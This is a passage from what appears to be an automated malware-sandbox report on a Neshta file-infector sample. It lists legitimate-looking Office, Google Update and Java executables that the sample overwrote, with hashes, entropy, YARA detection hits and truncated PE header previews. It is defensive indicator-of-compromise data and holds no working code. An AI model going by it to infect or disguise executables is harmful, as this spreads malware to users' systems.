                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.365915780903398
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.420838658743323
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.364257425575085
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.435519044418047
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.278417014765199
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.254081989191424
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.565853286242963
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.517183428602308
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.31341198420156
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.571220400525005
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.35638621946935
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.572547877647106
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.571346004771877
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5964179831347325
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.653521772684421
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.330325009255707
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.656070779362061
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6397427450636055
